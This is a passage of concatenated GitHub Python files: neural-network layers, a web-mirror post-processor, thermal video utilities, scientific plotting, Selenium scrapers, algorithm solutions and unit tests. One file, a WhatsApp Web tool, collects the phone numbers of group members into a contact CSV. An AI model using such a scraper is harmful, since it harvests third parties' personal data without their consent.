self._reversed_padding_repeated_twice, mode=self.padding_mode),\n                            self.weight, bias, self.stride,\n                            _pair(0), self.dilation, self.groups)\n        return F.conv2d(input, self.weight, bias, self.stride,\n                        self.padding, self.dilation, self.groups)\n\n    def forward(self, input: Tensor, input_jvp: Tensor) -> Tensor:\n        output = self._conv_forward(input)\n        output_jvp = self._linear_forward(input) + self._conv_forward(input_jvp, add_bias=False)\n        return output, output_jvp\n\nclass LinearLinear(nn.Linear):\n\n    def __init__(self, in_features: int, out_features: int, bias: bool = True) -> None:\n        super().__init__(in_features, out_features, bias)\n        self.linear_weight = 
Parameter(torch.zeros_like(self.weight, requires_grad=True) + NOISE_SCALE)\n if bias:\n self.linear_bias = Parameter(torch.zeros_like(self.bias, requires_grad=True) + NOISE_SCALE)\n else:\n self.linear_bias = None\n\n def forward(self, input: Tensor, input_jvp: Tensor) -> Tensor:\n output = super().forward(input)\n output_jvp = F.linear(input, self.linear_weight, self.linear_bias) + F.linear(input_jvp, self.weight, None)\n return output, output_jvp\n\nclass LinearReLU(nn.ReLU):\n\n def forward(self, input: Tensor, input_jvp: Tensor) -> Tensor:\n output = super().forward(input)\n output_jvp = input_jvp * (output > 0).float()\n return output, output_jvp\n\nclass LinearSequential(nn.Sequential):\n\n def forward(self, *input):\n for module in self:\n input = module(*input)\n return input\n\nclass LinearBatchNorm2d(nn.BatchNorm2d):\n def __init__(self, num_features: int, eps: float = 1e-5, momentum: float = 0.1, affine=True,\n track_running_stats=True) -> None:\n super().__init__(num_features, eps, momentum, affine, track_running_stats)\n if affine:\n self.linear_weight = Parameter(torch.zeros_like(self.weight, requires_grad=True) + NOISE_SCALE)\n self.linear_bias = Parameter(torch.zeros_like(self.bias, requires_grad=True) + NOISE_SCALE)\n\n def _linear_forward(self, input: Tensor) -> Tensor:\n return F.batch_norm(input, self.running_mean, self.running_var,\n self.linear_weight, self.linear_bias, training=False, momentum=self.momentum, eps=self.eps)\n\n def _jvp_forward(self, input: Tensor) -> Tensor:\n return F.batch_norm(input,\n torch.zeros_like(self.running_mean), self.running_var, self.weight, None, training=False,\n momentum=self.momentum, eps=self.eps)\n\n def forward(self, input: Tensor, input_jvp:Tensor) -> Tensor:\n output = super().forward(input)\n output_jvp = self._linear_forward(input) + self._jvp_forward(input_jvp)\n return output, output_jvp\n\nclass LinearAdaptiveAvgPool2d(nn.AdaptiveAvgPool2d):\n\n def __init__(self, output_size) -> None:\n super().__init__(output_size)\n\n def forward(self, input, input_jvp):\n return super().forward(input), super().forward(input_jvp)\n\n","repo_name":"tianyu139/tangent-model-composition","sub_path":"models/linear_layers.py","file_name":"linear_layers.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71424570340","text":"import glob\nfrom bs4 import BeautifulSoup, Tag, Comment\nimport re\nimport logging\nimport os\nimport gc\nfrom datetime import datetime\n\nBUILD_TIME = datetime.now().strftime(\"%d %B %Y, %H:%M:%S\")\nlogger = logging.getLogger()\nlogger.setLevel(os.environ.get(\"LOG_LEVEL\", \"CRITICAL\"))\n\n\n# change index\nfor html_file_path in glob.glob(\"**/index.html\", recursive=True):\n with open(html_file_path, \"rb+\") as file:\n soup = BeautifulSoup(file.read(), \"lxml\")\n soup.title.string = \"SUTD Capstone\"\n file.seek(0)\n file.write(bytes(str(soup), \"utf-8\"))\n file.truncate()\n soup.decompose()\n gc.collect()\n\nfor html_file_path in glob.glob(\"**/*.html\", recursive=True):\n if \"apos-minified\" in html_file_path:\n continue\n try:\n with open(html_file_path, \"rb+\") as file:\n soup = BeautifulSoup(file.read(), \"lxml\")\n # is this even valid html\n if soup.head is None:\n continue\n\n try:\n # try to derive the page url\n ORIGINAL_URL = \"https://capstone.sutd.edu.sg\"\n for comments in soup.findAll(\n text=lambda text: isinstance(text, Comment)\n ):\n try:\n comment = comments.extract().strip()\n if 
comment.index(\"Mirrored from\") == 0:\n m = re.search(r\"Mirrored from (.*) by HTTrack\", comment)\n ORIGINAL_URL = f\"https://{m.group(1)}\"\n break\n except:\n break\n except Exception as ex:\n logger.error(f\"Unable to derive page url for {html_file_path}\")\n # add meta tags\n # is it project?\n try:\n if len(soup.select(\"div.project-detail_detail\")) != 0:\n # is project\n project_name = soup.select(\n \"div.project-detail_detail .detail-title h2\"\n )[0].string\n og_preview_name = project_name\n og_preview_description = (\n \"[MIRROR] SUTD Capstone Project Virtual Showcase\"\n )\n else:\n og_preview_name = \"[MIRROR] SUTD Virtual Capstone Showcase 2020\"\n og_preview_description = (\n \"Find out more about SUTD's Capstone projects\"\n )\n meta_tag_attrs = [\n {\"property\": \"og:title\", \"content\": og_preview_name},\n {\"property\": \"og:description\", \"content\": og_preview_description},\n {\"name\": \"twitter:title\", \"content\": og_preview_name},\n {\"name\": \"twitter:description\", \"content\": og_preview_description},\n ]\n meta_tags = [soup.new_tag(\"meta\", attrs=a) for a in meta_tag_attrs]\n for meta_tag in meta_tags:\n soup.head.append(meta_tag)\n except Exception as ex:\n logger.error(f\"Unable to add meta tags on file {html_file_path}\")\n # add mirror build notice\n try:\n soup.select_one(\".navbar-default\").append(\n BeautifulSoup(\n f\"\"\"\n
    You're viewing a mirror built at {BUILD_TIME}.\n Click here to go to the original version.\n More Info\n
    \"\"\",\n \"html.parser\",\n )\n )\n except Exception as ex:\n logger.error(f\"Unable to add mirror notice on file {html_file_path}\")\n # attempt to restore data tags\n # try:\n # remote_response = requests.get(ORIGINAL_URL, verify=False, stream=True)\n # remote_response.raw.decode_content = True\n # # tree = lxml.html.parse(remote_response.raw)\n # remote_soup = BeautifulSoup(remote_response.raw, \"lxml\")\n # tags_with_data = soup.find_all(\n # re.compile(\".*\"), attrs={\"data-apos-widget-id\": re.compile(\".*\")}\n # )\n # for tag in tags_with_data:\n # this_widget_id = tag[\"data-apos-widget-id\"]\n # matching_tag = remote_soup.find(\n # re.compile(\".*\"),\n # attrs={\"data-apos-widget-id\": tag[\"data-apos-widget-id\"]},\n # )\n # if matching_tag is None:\n # continue\n # tag[\"data\"] = matching_tag[\"data\"]\n # except Exception as ex:\n # logger.error(f\"Unable to restore data stag for file {html_file_path}\")\n # fix youtube video links\n try:\n to_replace = [\n i\n for i in soup.select(\"img.apos-video-thumbnail\")\n if \"i.ytimg.com/vi/\" in i[\"src\"]\n ]\n video_id_matcher = re.compile(r\"i\\.ytimg\\.com/vi/(\\w+)/\")\n for img in to_replace:\n video_id = video_id_matcher.search(img[\"src\"]).group(1)\n iframe: Tag = soup.new_tag(\"iframe\")\n iframe[\"src\"] = f\"https://www.youtube.com/embed/{video_id}\"\n iframe[\"frameborder\"] = \"0\"\n iframe[\"style\"] = \"height: calc(100vw / 16 * 9)\"\n iframe[\n \"allow\"\n ] = \"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\"\n iframe[\"allowfullscreen\"] = \"\"\n img.replace_with(iframe)\n except Exception as ex:\n logger.error(\n f\"Unable to convert youtube video thumbnail for {html_file_path}\"\n )\n # save the file\n file.seek(0)\n file.write(bytes(str(soup), \"utf-8\"))\n file.truncate()\n soup.decompose()\n gc.collect()\n except:\n logger.error(f\"Error ocurred for file {html_file_path}\")\n pass\n","repo_name":"OpenSUTD/capstone_2020_mirror","sub_path":"playbooks/post_process/python_scripts/files/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74489563939","text":"import cv2\r\nimport datetime\r\nimport numpy as np\r\nimport os\r\nimport time\r\n\r\n# Thermal filenames format\r\nDATE_FORMAT = \"%Y-%m-%d_%H:%M:%S\"\r\n\r\ndef get_local_time_from_utc(time_str, date_format=\"%Y-%m-%d_%H:%M:%S\"):\r\n \"\"\" Parse the time string and get local time \"\"\"\r\n # Convert to UTC-7\r\n t = datetime.datetime.strptime(time_str, date_format) - datetime.timedelta(hours=7)\r\n return t\r\n\r\ndef thermal_file_within_date(thermal_filename, date):\r\n \"\"\"\r\n Check that the thermal file is within the given date\r\n thermal_filename: Ex. 2017-10-12_21:35:34.000000.mov\r\n date: Ex. 17-10-13\r\n \"\"\"\r\n # Get time of the thermal video\r\n time_str = thermal_filename.split('.')[0]\r\n t = get_local_time_from_utc(time_str)\r\n # Get start and end time of the day\r\n year, month, day = [int(x) for x in date.split('-')]\r\n year += 2000\r\n start = datetime.datetime(year=year, month=month, day=day)\r\n try:\r\n end = datetime.datetime(year=year, month=month, day=day+1)\r\n except:\r\n # (day+1) is out of range for month\r\n end = datetime.datetime(year=year, month=month+1, day=1)\r\n return t > start and t < end\r\n\r\ndef get_time_from_frame(end_time_in_seconds, video_length, frame_number, num_frames):\r\n \"\"\"\r\n Linearly calculate the time. 
frame_number can be a numpy array.\r\n \"\"\"\r\n # Time difference between frame and start of video\r\n delta = video_length / (num_frames - 1) * frame_number\r\n return end_time_in_seconds - video_length + delta\r\n\r\ndef calc_thermal_time(thermal_end_time, video_data, frame_number):\r\n \"\"\" Calculate time of a frame from thermal video. \"\"\"\r\n num_frames = video_data[\"num_frames\"]\r\n video_length = video_data[\"video_length\"]\r\n # Get end time\r\n end_time = get_local_time_from_utc(thermal_end_time)\r\n end_time_in_seconds = time.mktime(end_time.timetuple())\r\n t_in_seconds = get_time_from_frame(end_time_in_seconds, video_length, frame_number, num_frames)\r\n return t_in_seconds\r\n\r\ndef read_thermal_file(file_path, upside_down=False):\r\n \"\"\"\r\n Read a thermal video file, e.g. 2017-10-11_18:56:18.000000_1.mov.\r\n \"\"\"\r\n cap = cv2.VideoCapture(file_path)\r\n if not cap.isOpened():\r\n raise ValueError(\"OpenCV cannot open {}.\\nTry using /usr/bin/python3.\".format(file_path))\r\n\r\n frames = []\r\n while True:\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n if upside_down:\r\n frame = np.rot90(frame, k=2)\r\n # 3 channels, each channel is one frame.\r\n frames.append(frame[:,:,0])\r\n frames = np.array(frames)\r\n cap.release()\r\n return frames\r\n\r\ndef scale_thermal_frame(frame):\r\n \"\"\" Frame values are (temperature * 2) \"\"\"\r\n frame = (frame / 2).clip(10, 40) - 10\r\n frame = (frame / 30 * 255).astype(np.uint8)\r\n return frame\r\n\r\ndef write_thermal_frames(file_path, output_dir, scale_frame=False, upside_down=True):\r\n frames = read_thermal_file(file_path, upside_down)\r\n num_frames, height, width = frames.shape\r\n for i in range(num_frames):\r\n filename = \"t-{:06d}.png\".format(i)\r\n output_file = os.path.join(output_dir, filename)\r\n frame = frames[i]\r\n if scale_frame:\r\n frame = scale_thermal_frame(frames[i])\r\n cv2.imwrite(output_file, frame)\r\n\r\ndef read_thermal_timestamps(timestamps_file):\r\n \"\"\"\r\n Each line is in this format: 2017-10-20T05:45:05.458018Z\r\n Return timestamps in seconds.\r\n \"\"\"\r\n timestamps = []\r\n with open(timestamps_file, 'r') as f:\r\n for line in f:\r\n time_str, suffix = line.strip().split('.')\r\n date_format = \"%Y-%m-%dT%H:%M:%S\"\r\n t = get_local_time_from_utc(time_str, date_format)\r\n t_in_seconds = time.mktime(t.timetuple())\r\n ms = int(suffix[:3]) / 1000.0\r\n t_in_seconds += ms\r\n timestamps.append(t_in_seconds)\r\n return timestamps\r\n\r\n","repo_name":"ClaraBing/MED277ICU","sub_path":"data_annotate_NIPS18/utils/thermal_utils.py","file_name":"thermal_utils.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"20713530701","text":"import numpy as np\nimport math\nimport os\nfrom pathlib import Path\n\nfrom approximator.examples.heat.heat import approximation\nfrom approximator.utils.visualization import plot_approximation_residuals, plot_approximation, \\\n plot_approximation_deviation\n\ndir_path = Path(os.path.dirname(os.path.realpath(__file__)))\nfig_dir_path = dir_path.joinpath(\"figs\")\nfig_dir_path.mkdir(parents=False, exist_ok=True)\n# run_path = Path(f\"heat-3/1\")\nrun_path = Path(f\"2021-03-15 10:58:29.442608\")\n\napproximation.load(dir_path.joinpath(run_path).joinpath(\"net.pt\"))\n\nplot_approximation(\n approximation,\n xlabel=\"$t$\", ylabel=\"$z$\",\n title=\"Approximated solution of the heat equation\",\n dir_path=fig_dir_path,\n 
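# (added comment) save-only mode: the figure is written under figs/ without opening a window\n    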
show=False\n)\n\nplot_approximation_residuals(\n approximation,\n xlabel=\"$t$\", ylabel=\"$z$\",\n title=\"Residuals\",\n dir_path=fig_dir_path,\n show=False\n)\n\n\ndef analytically(t, z):\n return math.exp(-math.pi ** 2 * t / 4) * math.cos(math.pi * z / 2)\n\n\nplot_approximation_deviation(\n approximation,\n analytically,\n xlabel=\"$t$\", ylabel=\"$z$\",\n title=\"Difference to analytical solution\",\n dir_path=fig_dir_path,\n show=False\n)\n\n\ndef calculate_accuracy(approximation):\n # evaluate accuracy\n x_space = np.linspace(0, 1, 100)\n y_space = np.linspace(-1, 1, 100)\n z_space = [math.fabs(approximation.use(x, y) - analytically(x, y)) for x in x_space for y in y_space]\n\n print(\"min accuracy: \" + str(min(z_space)))\n print(\"max accuracy: \" + str(max(z_space)))\n\n accuracy = sum(z_space) / len(z_space)\n print(\"accuracy: \" + str(accuracy))\n return accuracy\n\n\ncalculate_accuracy(approximation)","repo_name":"yorickreum/approximator","sub_path":"examples/heat/results-thesis/example-run/show_heat.py","file_name":"show_heat.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27396362172","text":"from tkinter import *\nimport csv\nfrom threading import *\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom tkinter import *\nimport time\nimport tkinter.messagebox\nfrom selenium import webdriver\nfrom tkinter import ttk\n\n\n\ndef threading():\n t1=Thread(target=printel)\n t1.start()\n\n\ndef group_contact(target_text):\n\n try:\n frame = Frame(window, width=350, height=480, bg=\"white\")\n frame.place(x=440, y=456)\n p = ttk.Progressbar(frame, orient='horizontal', mode='indeterminate', length=300)\n p.grid(column=0, row=0, columnspan=2, padx=20, pady=20)\n p.start()\n rb_results = []\n time.sleep(5)\n elm = WebDriverWait(driver, 70000).until(\n EC.visibility_of_element_located((By.XPATH, '//*[@id=\"main\"]/header/div[2]/div[2]/span'))).text\n\n if elm == \"click here for contact info\" or elm == None:\n rb_results.append(\"0\")\n print(\"end\")\n\n else:\n rb_results.append(elm)\n print(\"go on...\")\n\n with open(\"group_contact/rb_results.csv\", \"w\", newline='') as resultFile:\n print(\"process go on \")\n writer = csv.DictWriter(resultFile, fieldnames=[\"Rb Results\"], delimiter=',')\n writer.writeheader()\n writer.writerows({'Rb Results': item} for item in rb_results)\n resultFile.close()\n df = pd.read_csv(\"group_contact/rb_results.csv\")\n rf = df.loc[0, 'Rb Results']\n rf = rf.replace(\",\", \"\\n\")\n x = rf.split(\"\\n\")\n rf = ''\n im = 1\n for el in x:\n if (el.startswith(' +')):\n rf = rf + str(target_text) + str(im) + \",* myContacts,\" + str(el) + \"\\n\"\n im = im + 1\n f = open('group_contact/' + target_text + '.csv', 'w', encoding=\"utf-8\")\n f.write(\"Name,Group Membership,Phone 1 - Value\\n\")\n f.write(rf)\n f.close()\n if rb_results != \"0\" or len(rb_results) != 0:\n p.stop()\n frame.destroy()\n tkinter.messagebox.showinfo(\"Success!!\",\n \"Number is saved in group contact file and the file name is same as your typed name\")\n except:\n pass\n\n\ndef printel():\n target = entry0.get()\n print(\"go on....\")\n time.sleep(5)\n group_contact(target)\n\n\n\n\noptions = webdriver.ChromeOptions()\ndriver = 
webdriver.Chrome(executable_path=r'.\\driver\\chromedriver.exe')\ndriver.get(\"https://web.whatsapp.com/\")\nwait = WebDriverWait(driver, 300)\nwindow = Tk()\nwindow.title('Vraag Whatsapp Scrapper')\nwindow.geometry(\"820x526\")\nwindow.configure(bg = \"#ffffff\")\ncanvas = Canvas(\n window,\n bg = \"#ffffff\",\n height = 526,\n width = 820,\n bd = 0,\n highlightthickness = 0,\n relief = \"ridge\")\ncanvas.place(x = 0, y = 0)\n\nbackground_img = PhotoImage(file = f\"media/w_background.png\")\nbackground = canvas.create_image(\n 418, 264,\n image=background_img)\n\nimg0 = PhotoImage(file = f\"media/w_img0.png\")\nb0 = Button(\n image = img0,\n borderwidth = 0,\n highlightthickness = 0,\n command = threading,\n relief = \"flat\")\n\nb0.place(\n x = 485, y = 330,\n width = 292,\n height = 50)\n\nentry0_img = PhotoImage(file = f\"media/w_img_textBox0.png\")\nentry0_bg = canvas.create_image(\n 630, 268,\n image = entry0_img)\n\nentry0 = Entry(\n bd = 0,\n bg = \"#a6a1cc\",\n highlightthickness = 0)\n\nentry0.place(\n x = 500, y = 250,\n width = 240.0,\n height = 36)\n\ncanvas.create_text(\n 590, 238,\n text = \"ENTER CSV FILE NAME\",\n fill = \"#000000\",\n font = (\"Anybody-Bold\", int(13.0)))\n\nwindow.resizable(False, False)\nwindow.mainloop()\n","repo_name":"Vraag0056/Social-Media-Scrapper-Python","sub_path":"whatsapp.py","file_name":"whatsapp.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32474310143","text":"from flask import Flask, request, render_template\nfrom cohesion import *\nfrom drinks_backend import *\n\napp = Flask(__name__)\nthe_data = [' ']\n\n@app.route(\"/\", methods = ['GET','POST'])\ndef hello_world():\n if request.method == \"POST\":\n #print (request.form.get(\"str\"))\n the_data.append(request.form.get(\"str\"))\n #print(the_data)\n\n return render_template(\"Main.html\")\n\n@app.route(\"/page\")\ndef page2():\n return render_template(\"Page2.html\", data = the_data)\n\n\n\n\n\n@app.route(\"/new\")\ndef demo():\n a_list = classify(the_data[-1])\n\n print(a_list[-1])\n return render_template(\"Search.html\", data = a_list )","repo_name":"ThunderRoar/Brewing-Borders-UofT-Hacks-X","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2884643784","text":"import __sub__\nfrom getRatesDatabase import *\nfrom inputSymbols import getSymbols\nimport csv\nfrom dbOperations import getConnection\n\nclient, db = getConnection()\nnameFile = f\"Extracted (Date Min) - {str(datetime.now().timestamp()).replace('.','')}\"\nsymbols = getSymbols()\nf_date_start = FirstDate(2021,4,18)\nf_date_end = LastDate(2022,4,20)\n\nwith open(f'extracteds/{nameFile}.csv', mode='w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['Ativo', 'Qtd Registros', 'Horario Minima', 'Ocorrencias'])\n \n for i, symbol in enumerate(symbols):\n datas = getTimesMin(db, symbol, f_date_start, f_date_end)\n qty_datas = len(datas)\n\n if qty_datas <= 0: continue\n\n count_dates = {}\n\n for data in datas:\n time_min = data['time']\n str_date = f\"{time_min.hour}:{time_min.minute}\"\n\n if(str_date in count_dates):\n count_dates[str_date] += 1 \n else: \n count_dates[str_date] = 1\n \n tmp_i = list(count_dates.keys())[0]\n tmp_v = list(count_dates.values())[0]\n\n for ind, val in count_dates.items():\n if val > tmp_v:\n tmp_i = ind\n tmp_v = val\n\n 
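# (added note) the loop above is a manual argmax over count_dates; an equivalent\n        # one-liner (up to tie-breaking) would be:\n        #   tmp_i, tmp_v = max(count_dates.items(), key=lambda kv: kv[1])\n        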
writer.writerow([symbol, qty_datas, tmp_i, tmp_v])\n print('Concluído: {:.2f}%'.format((i+1) / len(symbols) * 100))\n\nclient.close()\nprint(\"Ready!\")\n","repo_name":"gilsonmeira97/Stock-Trading-Controller","sub_path":"strategies/horarioMinimas_1.py","file_name":"horarioMinimas_1.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6345431042","text":"class Solution:\n # @param A : string\n # @return an integer\n def numDecodings(self, A):\n n=len(A)\n if n==1:\n if A=='0':\n return 0\n return 1\n if A[0]=='0':\n return 0\n dp=[0]*(n+1)\n dp[0]=1\n dp[1]=1\n for i in range(2,n+1):\n if A[i-1]=='0':\n if A[i-1-1]>'2':\n return 0\n if A[i-1]!='0':\n dp[i]+=dp[i-1]\n num = int(A[i-1-1] + A[i-1])\n if num<=26 and A[i-2]!='0':\n dp[i]+=dp[i-2]\n return dp[n]","repo_name":"akazuko/CompCoding","sub_path":"Interview Bit/DynamicProgramming/waysToDecode.py","file_name":"waysToDecode.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31346008592","text":"from aiogram.types import Message, ReplyKeyboardRemove, MediaGroup\nfrom aiogram.dispatcher.filters import Command\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import ChatActions\nfrom loader import dp, db\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom fake_useragent import UserAgent\nimport requests\nfrom aiogram.dispatcher.filters import Text\nimport os\nimport time\nfrom io import BytesIO\n\n@dp.message_handler(Text(contains='https://www.instagram.com',ignore_case=True))\nasync def handle_instagram_post(message: Message, state: FSMContext):\n await message.answer(\"Video yuklanmoqda iltimos biroz kuting\")\n options = webdriver.ChromeOptions()\n options.add_argument(f'user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36')\n # options.add_argument('--headless')\n driver = webdriver.Chrome(options=options)\n driver.get('https://snapinsta.app/')\n input = driver.find_element(By.XPATH,'//*[@id=\"url\"]')\n input.send_keys(message.text)\n time.sleep(0.5)\n driver.find_element(By.XPATH,'//*[@id=\"downloader\"]/form/button').click()\n time.sleep(3)\n div_elements = driver.find_elements(By.CLASS_NAME,'download-bottom')\n print(len(div_elements))\n\n hrefs_dict = {}\n for div_element in range(len(div_elements)):\n a_tag = div_elements[div_element].find_element(By.TAG_NAME, 'a')\n text = a_tag.text\n href = a_tag.get_attribute('href')\n hrefs_dict[text] = href\n print(len(hrefs_dict))\n\n # if len(hrefs_dict) == 1:\n # buffer = BytesIO()\n # res = requests.get(hrefs_dict[list(hrefs_dict.keys())[0]])\n\n # buffer.write(res.content)\n # buffer.seek(0)\n # if list(hrefs_dict.keys())[0] == \"Download Video\":\n # await message.answer_video(buffer)\n # else:\n # await message.answer_photo(buffer)\n\n # else:\n path = 'D:/Programming projects/Telegram bots/yuklabot/media/instagram'\n album = MediaGroup()\n for text, href in hrefs_dict.items():\n print(f\"{href}\\n\\n\")\n buffer = BytesIO()\n res = requests.get(href)\n buffer.write(res.content)\n buffer.seek(0)\n if \"Download Video\" in text:\n album.attach_video(buffer)\n else:\n album.attach_photo(buffer)\n await message.answer_media_group(album)\n 
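# (added comment) tear down the per-message browser session once the album is sent\n    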
driver.quit()\n","repo_name":"Xazratbek/TelegramBots","sub_path":"yuklabot/handlers/users/instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10816232561","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n dummy = ListNode()\n r, p, q = dummy, l1, l2\n while p and q:\n if p.val <= q.val:\n r.next = ListNode(p.val)\n r, p = r.next, p.next\n else:\n r.next = ListNode(q.val)\n r, q = r.next, q.next\n if p:\n r.next = p\n if q:\n r.next = q\n return dummy.next\n","repo_name":"jia0713/leetcode","sub_path":"001-100/021-Merge Two Sorted Lists.py","file_name":"021-Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"70345501220","text":"import contextlib\nimport io\nimport os\nimport tempfile\nimport unittest\nfrom typing import List\n\nimport numpy as np\n\nfrom quantumdataset import QuantumDataset\nfrom quantumdataset.externals.serialization import Serializer\n\n\nclass TestQuantumDataset(unittest.TestCase):\n def setUp(self):\n datadir = os.environ.get(\"QUANTUM_DATASET_TEST_DIR\")\n if datadir is None:\n datadir = tempfile.mkdtemp()\n self.qd = QuantumDataset(datadir)\n\n def test_check_quantum_dataset_installation(self):\n\n with tempfile.TemporaryDirectory() as tmpdir:\n result = QuantumDataset.check_quantum_dataset_installation(tmpdir)\n self.assertIsNone(result)\n\n def test_list_tags(self):\n tags = self.qd.list_tags()\n self.assertIsInstance(tags, List)\n\n subtags = self.qd.list_subtags(\"allxy\")\n self.assertIsInstance(subtags, list)\n\n def test_load_dataset(self):\n ds = self.qd.load_dataset(\"time_rabi\", 0)\n self.assertTrue(ds is not None)\n\n def test_show_data(self):\n with contextlib.redirect_stdout(io.StringIO()) as s:\n self.qd.show_data()\n self.assertIn(\"tag allxy\", s.getvalue())\n\n def test_database_metadata(self):\n m = self.qd.database_metadata()\n self.assertIsInstance(m, list)\n\n self.assertIsInstance(m[0].tag, str)\n\n def test_Serializer(self):\n s = Serializer()\n e = s.encode_data({\"1\": 1, \"a\": np.array([1, 2])})\n self.assertIsInstance(e, dict)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"QuTech-Delft/quantum_dataset","sub_path":"quantumdataset/tests/test_quantum_dataset.py","file_name":"test_quantum_dataset.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"36597335012","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import manifold\n\nimport params\nfrom nn.mikolov_sg import MikolovBiSG\nimport dal.dal_mikolov_bi_sg as dal\n\ndef vis(e):\n model = torch.load(f'./../results/MikolovBiSG_w5_d100_v81272lr0.01_b5000_e{e}.ptc')\n mikolovbisg = MikolovBiSG(model['params'])\n mikolovbisg.load_state_dict(model['state'])\n\n tsne = manifold.TSNE(n_components=2, init='random', random_state=0, perplexity=10)\n Y = tsne.fit_transform(mikolovbisg.W_I.weight.detach().numpy().transpose())\n plt.scatter(Y[:, 0], Y[:, 1])\n\ndef topn(source, e):\n ##load an existing model\n model = 
torch.load(f'./../results/MikolovBiSG_w5_d100_v81272lr0.01_b5000_e{e}.ptc')\n mikolovbisg = MikolovBiSG(model['params'])\n mikolovbisg.load_state_dict(model['state'])\n vocabs = dal.load_vocabs()\n\n s_idx = vocabs.index(source)\n s_v = torch.zeros(1, len(vocabs))\n s_v[0, s_idx] = 1\n s_t = mikolovbisg.forward(s_v)#softmax(WI * WO)\n probs, predictions = s_t.topk(10, dim=1)\n # print(mikolovbisg.W_I.weight[:,s_idx], mikolovbisg.W_O.weight[s_idx, :])\n # print(mikolovbisg.W_I.weight[:,predictions[0][0]], mikolovbisg.W_O.weight[predictions[0][0], :])\n print(f'{source}:{([vocabs[t_idx] for t_idx in predictions[0]])}')\n\nfor e in range(0, 31, 5):\n topn('korea', e)\n\n#vis(20)","repo_name":"hosseinfani/learning_nn","sub_path":"2013MikolovWV/src/peek_wv.py","file_name":"peek_wv.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1312984305","text":"import asyncio\nfrom datetime import datetime\nfrom unittest import mock\n\nfrom ovshell import api, testing\nfrom ovshell_core import gpstime\n\n\nasync def test_clock_indicator(\n ovshell: testing.OpenVarioShellStub, monkeypatch\n) -> None:\n # GIVEN\n datetime_mock = mock.Mock()\n datetime_mock.utcnow.return_value = datetime(2020, 6, 2, 12, 32, 54)\n monkeypatch.setattr(\"ovshell_core.gpstime.datetime\", datetime_mock)\n monkeypatch.setattr(\"ovshell_core.gpstime.CLOCK_POLL_INTERVAL\", 0.01)\n state = gpstime.GPSTimeState()\n\n # WHEN\n task = asyncio.create_task(gpstime.clock_indicator(ovshell.screen, state))\n await asyncio.sleep(0)\n\n clockind = ovshell.screen.stub_get_indicator(\"clock\")\n assert clockind is not None\n assert clockind.markup == (\"ind error\", \"12:32 UTC\")\n assert clockind.location == api.IndicatorLocation.LEFT\n\n state.acquired = True\n await asyncio.sleep(0.02)\n clockind = ovshell.screen.stub_get_indicator(\"clock\")\n assert clockind is not None\n assert clockind.markup == (\"ind normal\", \"12:32 UTC\")\n assert clockind.location == api.IndicatorLocation.LEFT\n\n task.cancel()\n\n\nasync def test_gps_time_sync(ovshell: testing.OpenVarioShellStub, monkeypatch) -> None:\n # GIVEN\n subpr_mock = mock.Mock()\n monkeypatch.setattr(\"ovshell_core.gpstime.subprocess\", subpr_mock)\n\n gprmc_fields = \"225446,A,4916.45,N,12311.12,W,000.5,054.7,191194,020.3\"\n ovshell.devices.stub_add_nmea(\n [\n api.NMEA(\"\", \"\", \"ZZZ\", []),\n api.NMEA(\"\", \"\", \"GPRMC\", gprmc_fields.split(\",\")),\n api.NMEA(\"\", \"\", \"AAA\", []),\n ]\n )\n state = gpstime.GPSTimeState()\n\n # WHEN\n await gpstime.gps_time_sync(ovshell, state)\n\n # THEN\n assert state.acquired is True\n datebin = ovshell.os.path(\"//bin/date\")\n subpr_mock.run.assert_called_with(\n [datebin, \"+%F %H:%M:%S\", \"-s\", \"1994-11-19 22:54:46\"],\n check=True,\n capture_output=True,\n )\n\n\ndef test_parse_gps_datetime_correct() -> None:\n # GIVEN\n 